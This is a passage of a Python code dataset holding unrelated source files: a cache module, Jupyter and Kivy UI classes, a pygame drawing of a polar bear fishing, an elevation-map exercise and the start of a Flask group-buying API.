json.dump(files, o)\n\n def lookup_files(self, id: str) -> Optional[List[Tuple[str, str]]]:\n f = self._files_cache_file(id)\n if not f.exists():\n return None\n with f.open('r') as i:\n return json.load(i)\n\n def set_inmem(self, id: str, v: Any):\n self._in_memory_cache[id] = v\n\n def lookup_inmem(self, id: str) -> Optional[Any]:\n global _ignore_cache\n if _ignore_cache or self._ignore_cache:\n return None\n\n if id not in self._in_memory_cache:\n return None\n return self._in_memory_cache[id]\n\n def data_file_location(self, request_id: str, data_name: str) -> Path:\n '''\n Return the path to the file that should be written out for this\n data_name. This is where the output file should get stored.\n Truncate the leftmost characters from filenames to avoid throwing a\n OSError: [Errno 63] File name too long error Assume that the most unique part of\n the name is the right hand side\n '''\n parent = self._path / 'data' / request_id\n parent.mkdir(parents=True, exist_ok=True)\n sanitized = sanitize_filename(data_name)\n return parent / sanitized[-1 * (MAX_PATH_LEN - len(parent.name)):]\n","sub_path":"servicex/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"232443479","text":"import os\n\nimport ipywidgets as w\nimport numpy as np\nfrom glue_jupyter.utils import validate_data_argument\nfrom traitlets import Unicode, List, Bool, Any, Dict, Int\n\nfrom ...core.events import (LoadDataMessage, DataSelectedMessage,\n NewViewerMessage)\nfrom ...core.registries import trays, viewers\nfrom ...core.template_mixin import TemplateMixin\nfrom ...components.data_tree import DataTree\nfrom ..file_loader import FileLoader\n\n__all__ = ['TrayArea']\n\nwith open(os.path.join(os.path.dirname(__file__), \"tray_area.vue\")) as f:\n TEMPLATE = f.read()\n\n\nclass TrayArea(TemplateMixin):\n template = Unicode(TEMPLATE).tag(sync=True)\n drawer = Bool(True).tag(sync=True)\n data = Unicode(\"\"\"\n {\n files: undefined\n }\n \"\"\").tag(sync=True)\n methods = Unicode(\"\"\"\n {\n returnFiles() {\n return this.files && this.files.name;\n }\n }\n \"\"\").tag(sync=True)\n\n viewers = List([]).tag(sync=True)\n\n base_items_tab = Int(0).tag(sync=True)\n base_items = List([\n {\n 'id': 1,\n 'title': \"Data\",\n 'widget': \"g-data-tree\"\n }\n ]).tag(sync=True, **w.widget_serialization)\n\n plugin_items_tab = Int(0).tag(sync=True)\n plugin_items = List([]).tag(sync=True, **w.widget_serialization)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Attach tray plugins from the registries\n components = {'g-data-tree': DataTree(session=self.session),\n 'g-file-loader': FileLoader(session=self.session)}\n components.update({k: v.get('cls')(session=self.session)\n for k, v in trays.members.items()})\n\n self.components = components\n\n # Load in the references to the viewer registry. Because traitlets\n # can't serialize the actual viewer class reference, create a list of\n # dicts containing just the viewer name and label.\n self.viewers = [{'name': k, 'label': v['label']}\n for k, v in viewers.members.items()]\n\n def vue_create_viewer(self, name):\n viewer_cls = viewers.members[name]['cls']\n\n selected = self.components.get('g-data-tree').selected\n\n for idx in selected:\n data = validate_data_argument(self.data_collection,\n self.data_collection[idx])\n\n new_viewer_message = NewViewerMessage(\n viewer_cls, data=data, sender=self)\n\n self.hub.broadcast(new_viewer_message)\n","sub_path":"jdaviz/components/tray_area/tray_area.py","file_name":"tray_area.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"479394892","text":"# UserInterface.py\n# Sean Duane\n# 02/05/2013\n# Manages the UI\n\nfrom code import main_menu_widget, red_park_street_widget, subway_widget\nfrom code.user_interface.widgets import orange_line_widget, red_line_widget, \\\n\ttransit_display\nfrom kivy.uix.screenmanager import SlideTransition, Screen\n\nclass UIManager():\n\t_WidgetDictionary = {}\n\t_WidgetStack = []\n\t_CurrentWidget = None\n\t_ScreenManager = None\n\t#__RootWidget = None\n\t\n\tdef __init__(self, inScreenManager):\n\t\tself._ScreenManager = inScreenManager\n\t\tself._ScreenManager.transition=SlideTransition(direction='left')\n\t\t\n\t\tself.ConstructForms()\n\t\t\n\tdef Startup(self):\n\t\t#@HACK changing widget to the first form here\n\t\tself.ChangeWidget(\"MainMenu\", None)\n\t\t\n\tdef ConstructForms(self):\n\t\t#@HACK add forms elsewhere!\n\t\t#main menu\n\t\tself._WidgetDictionary[\"MainMenu\"] = main_menu_widget.MainMenuWidget(name=\"MainMenu\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"MainMenu\"])\n\t\t\n\t\t#subway\n\t\tself._WidgetDictionary[\"Subway\"] = subway_widget.SubwayWidget(name=\"Subway\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"Subway\"])\n\t\n\t\t#transit display\n\t\tself._WidgetDictionary[\"TransitDisplay\"] = transit_display.TransitDisplayWidget(name=\"TransitDisplay\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"TransitDisplay\"])\n\t\t\n\t\t#red line\n\t\tself._WidgetDictionary[\"RedLine\"] = red_line_widget.RedLineWidget(name=\"RedLine\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"RedLine\"])\n\t\t\n\t\t#park street\n\t\tself._WidgetDictionary[\"RedParkStreet\"] = red_park_street_widget.RedParkStreetWidget(name=\"RedParkStreet\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"RedParkStreet\"])\n\t\t\n\t\t#orange line\n\t\tself._WidgetDictionary[\"OrangeLine\"] = orange_line_widget.OrangeLineWidget(name=\"OrangeLine\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"OrangeLine\"])\n\t\n\tdef Update(self):\n\t\tpass\n\t\t\n\tdef ChangeWidget(self, inWidgetName, inWidgetArgs):\n\t\tif (inWidgetName in self._WidgetDictionary):\n\t\t\tprint (\"Pushing widget named\", inWidgetName)\n\t\t\t\n\t\t\t# Set the current widget\n\t\t\tself._CurrentWidget = self._WidgetDictionary[inWidgetName]\n\t\t\t# Push it to the stack\n\t\t\tself._WidgetStack.append(self._CurrentWidget)\n\t\t\t# Clear out other widgets\n\t\t\t#self._ScreenManager.clear_widgets()\n\t\t\t# Add our widget\n\t\t\t#self._ScreenManager.add_widget(self._CurrentWidget)\n\t\t\tself._CurrentWidget.PreEnter()\n\t\t\tself._CurrentWidget.Initialize(inWidgetArgs)\n\t\t\tself._ScreenManager.current = inWidgetName\n\t\telse:\n\t\t\tprint (\"No widget named \", inWidgetName)\n\t\t\t","sub_path":"ProjectMotion/code/user_interface/ui_manager.py","file_name":"ui_manager.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"269573336","text":"import pygame\r\nfrom pygame.draw import *\r\n\r\npygame.init()\r\nFPS = 30\r\nscreen = pygame.display.set_mode((800, 1000))\r\n\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nyellow = (254, 240, 0)\r\n\r\n\r\n# background\r\npolygon(screen, (255, 255, 255), [(0, 0), (1000, 0), (1000, 1200), (0, 1200), (0, 0)])\r\npolygon(screen, (136, 206, 250), [(0, 0), (0, 650), (1000, 650), (1000, 0), (0, 0)])\r\npolygon(screen, (0, 0, 0), [(0, 650), (1000, 650), (1000, 651), (0, 651), (0, 650)])\r\n\r\n\r\ndef sun(x, y, r, d, do, col = yellow):\r\n \"\"\"\r\n Функция рисует солнце\r\n :param x: абсцисса центра\r\n :param y: ордината центра\r\n :param r: Радиус солнца\r\n :param d: толщина обводки круга\r\n :param do: толщина ширины \"креста\"\r\n :param col: цвет солнца\r\n :return: ---\r\n \"\"\"\r\n circle(screen, col, (x, y), r, d)\r\n rect(screen, col, [x - do / 2, y - r, do, 2 * r])\r\n rect(screen, col, [x - r, y - do / 2, 2 * r, do])\r\n\r\ndef fisher(x, y, d):\r\n \"\"\"\r\n Функция рисует медведя с удочкой\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :return: ---\r\n \"\"\"\r\n bear(x, y, d)\r\n environment(x, y, d)\r\n\r\n\r\ndef bear(x, y, d):\r\n \"\"\"\r\n Функция рисует медведя\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :param col_eyes: цвет глаз медведя\r\n :param col_mouth: цвет рта медведя\r\n :return: ---\r\n \"\"\"\r\n body(x, y, d)\r\n leg(x, y, d)\r\n arm(x, y, d)\r\n head(x, y, d)\r\n\r\ndef environment(x, y, d, col_fbody = (255, 0, 0), col_ftail = (100, 0, 0), col_feye = (254, 240, 0), col_rod_base = black, col_rod_line = black, col_water = (66, 49, 137), col_ice = (44, 146, 242)):\r\n \"\"\"\r\n Функция рисует прорубь, удочку и рыба\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :param col_rod_base: цвет удочки\r\n :param col_rod_line: цвет лески\r\n :param col_fbody: цвет тела рыбы\r\n :param col_ftail: цвет хвоста рыбы\r\n :param col_feye: цвет глаза рыбы\r\n :param col_water: цвет воды\r\n :param col_ice: цвет льда под снегом\r\n :return: ---\r\n \"\"\"\r\n ice_hole(x, y, d, col_water, col_ice)\r\n fishing_rod(x, y, d, col_rod_base, col_rod_line)\r\n fish(x, y, d, col_fbody, col_ftail, col_feye)\r\n\r\ndef head(x, y, d, col_eyes = black, col_ground = white, col_outline = black, col_mouth = black):\r\n \"\"\"\r\n Функция рисует голову медведя\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :param col_eyes: цвет глаз медведя\r\n :param col_mouth: цвет рта медведя\r\n :return: ---\r\n \"\"\"\r\n bear_head(x, y, d, col_ground, col_outline)\r\n eyes(x, y, d, col_eyes)\r\n ear(x, y, d, col_ground, col_outline)\r\n mouth(x, y, d, col_mouth)\r\n\r\ndef body(x, y, d, col_ground = white, col_outline = black):\r\n \"\"\"\r\n Функция рисования туловища и его обводки\r\n :param x: абсцисса центра тела\r\n :param y: ординат�� центра тела\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x - d, y - 2 * d, 2 * d, 4 * d])\r\n ellipse(screen, col_outline, [x - d, y - 2 * d, 2 * d, 4 * d], 1)\r\n\r\ndef leg(x, y, d, col_ground = white, col_outline = black):\r\n \"\"\"\r\n Функция рисует ногу\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return:\r\n \"\"\"\r\n bedro(x, y, d, col_ground, col_outline)\r\n golen(x, y, d, col_ground, col_outline)\r\n\r\ndef bedro(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует бедро\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x, y + d, 2 * d, 3 / 2 * d])\r\n ellipse(screen, col_outline, [x, y + d, 2 * d, 3 / 2 * d], 1)\r\n\r\n\r\ndef bear_head(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует шаблон головы\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела(прямоугольник в агрументе эллипса начинается с точки, лежащей выше тела на d/2, где d*4 длина тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x, y - 5 / 2 * d, 2 * d, 3 / 2 * d])\r\n ellipse(screen, col_outline, [x, y - 5 / 2 * d, 2 * d, 3 / 2 * d], 1)\r\n\r\n\r\ndef golen(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует голень\r\n :param x: абсцисса центра тела(прямоугольник в агрументе эллипса смещён на d/2 вправо, где d*2 ширина тела)\r\n :param y: ордината центра тела(прямоугольник в агрументе эллипса смещён к нижней точке тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x, y + d, 2 * d, 3 / 2 * d])\r\n ellipse(screen, col_outline, [x, y + d, 2 * d, 3 / 2 * d], 1)\r\n\r\n\r\n\r\ndef eyes(x, y, d, col_eyes):\r\n \"\"\"\r\n Функция рисует глаза\r\n :param x: абсцисса центра тела(смещением получиим самую правую точку(глаз1))\r\n :param y: ордината центра тела(смещением получиим самую правую точку(глаз1))\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_eyes: цвет глаз\r\n :return:\r\n \"\"\"\r\n circle(screen, col_eyes, (x + d, y - 2 * d), d / 10)\r\n circle(screen, col_eyes, (x + 15 / 8 * d, y - 2 * d), d / 10)\r\n\r\n\r\ndef ear(x, y, d, col_ground, col_outline):\r\n \"\"\"\r\n Функция рисует ухо\r\n :param x: абсцисса центра тела(вправо на четверть тела)\r\n :param y: ордината центра тела(смещение на 1/8 длины тела выше верхней точки)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x + d / 4, y - 5 / 2 * d, d / 3, d / 2])\r\n ellipse(screen, col_outline, [x + d / 4, y - 5 / 2 * d, d / 3, d / 2], 1)\r\n\r\n\r\ndef arm(x, y, d, col_ground = white, col_outline = black):\r\n \"\"\"\r\n Функция рисует руку\r\n :param x: абсцисса центра тела(прямоугольник в агрументе эллипса смещён на 2/3d направо, где d ширина тела)\r\n :param y: ордин��та центра тела(прямоугольник в агрументе эллипса смещён на d/2 вверх, где 4*d высота тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x + d * 2 / 3, y - d / 2, d, 1 / 2 * d])\r\n ellipse(screen, col_outline, [x + d * 2 / 3, y - d / 2, d, 1 / 2 * d], 1)\r\n\r\n\r\ndef mouth(x, y, d, col_mouth):\r\n \"\"\"\r\n Функция рисует рот\r\n :param x: абсцисса центра тела(прямоугольник в агрументе эллипса смещён на d/2 направо, где d ширина тела)\r\n :param y: ордината центра тела(прямоугольник в агрументе эллипса смещён на d/2 выше центра, где 4*d высота тела)\r\n :param d: коэффициент пропорциональности\r\n :param col_mouth: цвет рта\r\n :return:\r\n \"\"\"\r\n y1 = y - 3 / 2 * d\r\n x1 = x + d / 2\r\n x2 = x + 3 / 2 * d\r\n polygon(screen, col_mouth,\r\n [(x1, y1), (x2, y1), (x2, y1 + 1),\r\n (x1, y1 + 1), (x1, y1)])\r\n\r\n\r\ndef ice_hole(x, y, d, col_water, col_ice):\r\n \"\"\"\r\n Функция рисует прорубь\r\n :param x: абсцисса центра тела(смещение на 2.5 ширины от центра вправо)\r\n :param y: ордината центра тела(смещение на 1/6 длины от центра вниз)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_water: цвет воды\r\n :param col_ice: цвет льда\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_water, [x + d * 4.8, y + d * 1.5, 1.5 * d, 3 / 4 * d])\r\n ellipse(screen, col_ice, [x + d * 5, y + d * 1.7, d, 1 / 2 * d])\r\n\r\n\r\ndef fishing_rod(x, y, d, col_rod_base, col_rod_line):\r\n \"\"\"\r\n Функция рисует удочку\r\n :param x: абсцисса центра тела(смещается на длину руки)\r\n :param y: ордината центра тела(смещается до верхней точки эллипса)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_rod_base: цвет удочки\r\n :param col_rod_line: цвет лески\r\n :return: ---\r\n \"\"\"\r\n arc(screen, col_rod_base, [x + 3 / 2 * d, y - 2 * d, 5 * d, 5 * d], 1, 3, 5)\r\n aaline(screen, col_rod_line, [x + 5.36 * d, y + 2 * d], [x + 5.36 * d, y - 1.6 * d], 3)\r\n\r\n\r\ndef fish(x, y, d, col_fbody, col_ftail, col_feye):\r\n \"\"\"\r\n Функция рисует рыбу\r\n :param x: абсцисса центра тела медведя(смещается к проруби)\r\n :param y: ордината центра тела медведя(смещается к проруби)\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_fbody: цвет тела рыбы\r\n :param col_ftail: цвет хвоста рыбы\r\n :param col_feye: цвет глаза рыбы\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_fbody, [x + d * 5, y + d * 2.5, 0.5 * d, 1 / 4 * d])\r\n A = (x + 5 * d, y + 2.6 * d)\r\n xq = x + 4.8 * d\r\n polygon(screen, col_ftail, [A, (xq, y + 2.7 * d), (xq, y + 2.5 * d), A])\r\n circle(screen, col_feye, (x + 5.3 * d, y + 2.6 * d), d / 20)\r\n\r\n\r\nfisher(105, 600, 100)\r\nsun(680, 150, 100, 30, 10)\r\n\r\npygame.display.update()\r\nclock = pygame.time.Clock()\r\nfinished = False\r\nwhile not finished:\r\n clock.tick(FPS)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finished = True\r\n\r\npygame.quit()\r\n","sub_path":"picture9.1.py","file_name":"picture9.1.py","file_ext":"py","file_size_in_byte":13156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"6878396","text":"from typing import List\n\n\ndef get_average_elevation(m: List[List[int]]) -> float:\n \"\"\"\n Returns the average elevation across the elevation map m.\n\n Examples\n >>> get_average_elevation([])\n 0\n >>> m = [[1,2,3],[4,5,6],[7,8,9]]\n >>> get_average_elevation(m)\n 5.0\n >>> m = [[1,2,2,5],[4,5,4,8],[7,9,9,1],[1,2,1,4]]\n >>> get_average_elevation(m)\n 4.0625\n \"\"\"\n if not valid_map(m):\n return 0\n terms = 0\n amount = 0\n # set up to caalculate average\n for x in range(len(m)):\n for y in range(len(m[x])):\n terms += 1\n amount += m[x][y]\n return amount/terms\n\n\ndef find_peak(m: List[List[int]]) -> List[int]:\n \"\"\"\n Given an non-empty elevation map m, returns the cell of the\n highest point in m.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,2,3],\n [9,8,7],\n [5,4,6]]\n >>> find_peak(m)\n [1,0]\n >>> m = [[6,2,3],\n [1,8,7],\n [5,4,9]]\n >>> find_peak(m)\n [2,2]\n \"\"\"\n # checking for condition\n if not valid_map(m):\n return [0, 0]\n index_cell = [0, 0]\n biggest_cell = [0]\n # finding the biggest value and its index\n for x in range(len(m)):\n for y in range(len(m[x])):\n if m[x][y] > biggest_cell[0]:\n biggest_cell[0] = m[x][y]\n index_cell[0] = x\n index_cell[1] = y\n return index_cell\n\n\ndef is_sink(m: List[List[int]], c: List[int]) -> bool:\n \"\"\"\n Returns True if and only if c is a sink in m.\n \n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,2,3],\n [2,3,3],\n [5,4,3]]\n >>> is_sink(m, [0,0])\n True\n >>> is_sink(m, [2,2])\n True\n >>> is_sink(m, [3,0])\n False\n >>> m = [[1,2,3],\n [2,1,3],\n [5,4,3]]\n >>> is_sink(m, [1,1])\n True\n \"\"\"\n # a = min([min(g) for g in m])\n # check fo conditions\n # valid or not\n if not valid_map(m):\n return False\n # out of bound\n if not c or c[0] > len(m)-1 or c[1] > len(m[0])-1:\n return False\n # create new list called map\n map = []\n # fill the list (map) with -1\n for x in range(len(m)+2):\n map.insert(x, [-1]*(len(m)+2))\n # put m in map\n for x in range(1, len(map)-1):\n for y in range(1, len(map)-1):\n map[x][y] = m[x-1][y-1]\n # biggest crunh in my history (too lazy to do it with an algorythm)\n # we need to compare 8 possibilities; thefore index should be equal to 8\n index = 0\n # since we put orininal m in map, m variables shifted by 1\n x = c[0] + 1\n y = c[1] + 1\n # 8 possibilities\n # creating direction list and running trhough the loop will be efficient\n # however; I am too lazy\n if map[x][y] <= map[x+1][y+1] or map[x+1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x+1][y] or map[x+1][y] == -1:\n index += 1\n if map[x][y] <= map[x+1][y-1] or map[x+1][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y-1] or map[x][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y+1] or map[x][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y+1] or map[x-1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y] or map[x-1][y] == -1:\n index += 1\n if map[x][y] <= map[x-1][y-1] or map[x-1][y-1] == -1:\n index += 1\n return index == 8\n\n\ndef find_local_sink(m: List[List[int]], start: List[int]) -> List[int]:\n \"\"\"\n Given a non-empty elevation map, m, starting at start,\n will return a local sink in m by following the path of lowest\n adjacent elevation.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[ 5,70,71,80],\n [50, 4,30,90],\n [60, 3,35,95],\n [10,72, 2, 1]]\n >>> find_local_sink(m, [0,0])\n [3,3]\n >>> m = [[ 5,70,71,80],\n [50, 4, 5,90],\n [60, 3,35, 2],\n [ 1,72, 6, 3]]\n >>> find_local_sink(m, [0,3])\n [2,3]\n >>> m = [[9,2,3],\n [6,1,7],\n [5,4,8]]\n >>> find_local_sink(m, [1,1])\n [1,1]\n \"\"\"\n # valid or not\n if not valid_map(m):\n return False\n # create new list called map\n map = []\n # fill the list (map) with -1\n for x in range(len(m)+2):\n map.insert(x, [-1]*(len(m)+2))\n # put m in map\n for x in range(1, len(map)-1):\n for y in range(1, len(map)-1):\n map[x][y] = m[x-1][y-1]\n # since we put orininal m in map, m variables shifted by 1\n x = start[0] + 1\n y = start[1] + 1\n directions = [[1, 1], [1, 0], [1, -1], [0, -1], [0, 1], [-1, 1], [-1, 0], [-1, -1]]\n # range *2 because it is the longest possible distance\n for a in range(len(map)*2):\n # checking if the cell is miminima in its nbhd. if yes return x & y\n index = 0\n if map[x][y] <= map[x+1][y+1] or map[x+1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x+1][y] or map[x+1][y] == -1:\n index += 1\n if map[x][y] <= map[x+1][y-1] or map[x+1][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y-1] or map[x][y-1] == -1:\n index += 1\n if map[x][y] <= map[x][y+1] or map[x][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y+1] or map[x-1][y+1] == -1:\n index += 1\n if map[x][y] <= map[x-1][y] or map[x-1][y] == -1:\n index += 1\n if map[x][y] <= map[x-1][y-1] or map[x-1][y-1] == -1:\n index += 1\n if index == 8:\n return [x - 1, y - 1]\n # checking for out bound\n if x == len(map[x])-2 and y == len(map[x])-2:\n break\n # find all differencies around cell and put them in array\n l_differencies = []\n for i in range(8):\n q = map[x+directions[i][0]][y+directions[i][1]]\n save = map[x][y] + q\n if q < 0:\n save = -1\n l_differencies.append(save)\n # if maximum value in array of differncies is negative, break\n if max([n for n in l_differencies]) < 0:\n break\n # find minimum difference\n minima = min([n for n in l_differencies if n > 0])\n # index of minimum equals to direction, apply that that direction\n # 0\n if l_differencies.index(minima) == 0:\n x = x + 1\n y = y + 1\n # 1\n elif l_differencies.index(minima) == 1:\n x = x + 1\n y = y\n # 2\n elif l_differencies.index(minima) == 2:\n x = x + 1\n y = y - 1\n # 3\n elif l_differencies.index(minima) == 3:\n x = x\n y = y - 1\n # 4\n elif l_differencies.index(minima) == 4:\n x = x\n y = y + 1\n # 5\n elif l_differencies.index(minima) == 5:\n x = x - 1\n y = y + 1\n # 6\n elif l_differencies.index(minima) == 6:\n x = x - 1\n y = y\n # 7\n elif l_differencies.index(minima) == 7:\n x = x - 1\n y = y - 1\n return [x - 1, y - 1]\n\n\ndef absolute(x):\n if x < 0:\n return -x\n return x\n\n\ndef valid_map(m: List[List[int]]) -> bool:\n \"\"\"\n Checks if the map is valid or not. Returns True or False\n \"\"\"\n if not m:\n return False\n for x in range(len(m)):\n cells = 0\n for y in range(len(m[x])):\n cells += 1\n if cells != len(m):\n return False\n return True\n\n\ndef can_hike_to(m: List[List[int]], s: List[int], d: List[int], supplies: int) -> bool:\n \"\"\"\n Given an elevation map m, a start cell s, a destination cell d, and\n the an amount of supplies returns True if and only if a hiker could reach\n d from s using the strategy dscribed in the assignment .pdf. Read the .pdf\n carefully. Assume d is always south, east, or south-east of s. The hiker\n never travels, north, west, nor backtracks.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,4,3],\n [2,3,5],\n [5,4,3]]\n >>> can_hike_to(m, [0,0], [2,2], 4)\n True\n >>> can_hike_to(m, [0,0], [0,0], 0)\n True\n >>> can_hike_to(m, [0,0], [2,2], 3)\n False\n >>> m = [[1, 1,100],\n [1,100,100],\n [1, 1, 1]]\n >>> can_hike_to(m, [0,0], [2,2], 4)\n False\n >>> can_hike_to(m, [0,0], [2,2], 202)\n True\n \"\"\"\n # valid or not\n if not valid_map(m):\n return False\n # create new list called map\n map = []\n # fill the list (map) with -1\n for x in range(len(m)+2):\n map.insert(x, [-1]*(len(m)+2))\n # put m in map\n for x in range(1, len(map)-1):\n for y in range(1, len(map)-1):\n map[x][y] = m[x-1][y-1]\n # since we put orininal m in map, m variables shifted by 1\n x = s[0] + 1\n y = s[1] + 1\n directions = [[0, 1], [1, 0]]\n supply = supplies\n if [x - 1, y - 1] == d:\n return True\n # range *2 because it is the longest possible distance\n for a in range(len(map)*2):\n # checking for out bound\n if x == len(map[x]) or y == len(map[x]):\n break\n if supply < 0:\n return False\n # find all sum around cell and put them in array\n l_differencies = []\n l_supply = []\n for i in range(2):\n q = map[x+directions[i][0]][y+directions[i][1]]\n save = map[x][y] + q\n s_save = map[x][y] - q\n if q < 0:\n save = -1\n l_differencies.append(save)\n l_supply.append(absolute(s_save))\n # if maximum value in array of differncies is negative, break\n if max([n for n in l_differencies]) < 0:\n break\n # find minimum difference\n maxima = min([n for n in l_differencies if n > 0])\n # index of minimum equals to direction, apply that that direction\n if [x - 1, y - 1] == d:\n return True\n # east\n if l_differencies.index(maxima) == 0:\n supply = supply - l_supply[0]\n x = x\n y = y + 1\n #print([x - 1, y - 1])\n # south\n elif l_differencies.index(maxima) == 1:\n supply = supply - l_supply[1]\n x = x + 1\n y = y\n #print([x - 1, y - 1])\n if [x - 1, y - 1] == d:\n return True\n return False\n\n\ndef rotate_map(m: List[List[int]]) -> None:\n \"\"\"\n Rotates the orientation of an elevation map m 90 degrees counter-clockwise.\n See the examples to understand what's meant by rotate.\n\n Examples (note some spacing has been added for human readablity)\n >>> m = [[1,2,3],\n [2,3,3],\n [5,4,3]]\n >>> rotate_map(m)\n >>> m\n [[3,3,3],\n [2,3,4],\n [1,2,5]]\n >>> m = [[5,9,1,8],\n [2,4,5,7],\n [6,3,3,2],\n [1,7,6,3]]\n >>> rotate_map(m)\n >>> m\n [[8,7,2,3],\n [1,5,3,6],\n [9,4,3,7],\n [5,2,6,1]]\n \"\"\"\n # valid or not\n if not valid_map(m):\n return False\n side = len(m[0])\n # OMG! rotating by layers\n for x in range(0, int(side/2)):\n for y in range(x, side-1-x):\n save = m[x][y]\n # from right side to top\n m[x][y] = m[y][side-1-x]\n # from bot to right side\n m[y][side-1-x] = m[side-1-x][side-1-y]\n # from left side to bot\n m[side-1-x][side-1-y] = m[side-1-y][x]\n # left to save\n m[side-1-y][x] = save\n return None\n\n\ndef create_real_map() -> List[List[int]]:\n \"\"\"\n Creates and returns an elevation map from the real world data found\n in the file elevation_data.csv.\n\n Make sure this .py file and elevation_data.csv are in the same directory\n when you run this function to ensure it works properly.\n \"\"\"\n data = open(\"elevation.csv\")\n m = []\n for line in data:\n m.append(line.split(\",\"))\n data.close()\n for i in range(len(m)):\n for j in range(len(m[i])):\n m[i][j] = int(m[i][j])\n return m\n","sub_path":"waterfall_problem.py","file_name":"waterfall_problem.py","file_ext":"py","file_size_in_byte":12127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"560063743","text":"# -*- coding: utf-8 -*-\n\nfrom flask import jsonify, make_response, request, current_app\nfrom flask.ext.restful import Resource\nfrom control.pinpin import Pager, GroupStatus\nfrom module.group.grouphead import GroupHead as GroupHeadModel\nfrom flask.ext.login import current_user\nfrom control.post_weibo import post_weibo\nfrom view.group import group_operator\nfrom view.order import order_operator\nfrom control.ErrorMessages import ErrorMessages as errMsgs\nfrom control.pp import logit\nfrom view.tools.tools import sendException, sendText\nimport arrow\nfrom control.sendmail import sendNewGrouperHelp\n\n\ndef notify(**param):\n post_weibo(**param)\n sendText(u'{nickname} 开了新的团,{body} {url}'.format(nickname=param.get(\n 'nickname'), body=param.get('body'), url=param.get('url')))\n\n\nclass Groups(Resource):\n\n @logit\n def get(self):\n \"\"\"分页返回正在拼团的团,按创建时间倒序\"\"\"\n\n next = False\n prev = False\n try:\n per = request.args.get('per')\n page = request.args.get('page')\n except:\n per = 16\n page = 1\n try:\n per = int(per)\n page = int(page)\n except:\n per = 16\n page = 1\n\n from redisapp import (\n RedisApp,\n list_group_cache_stats\n )\n from redisconfig import (\n GROUPS_API_GET,\n 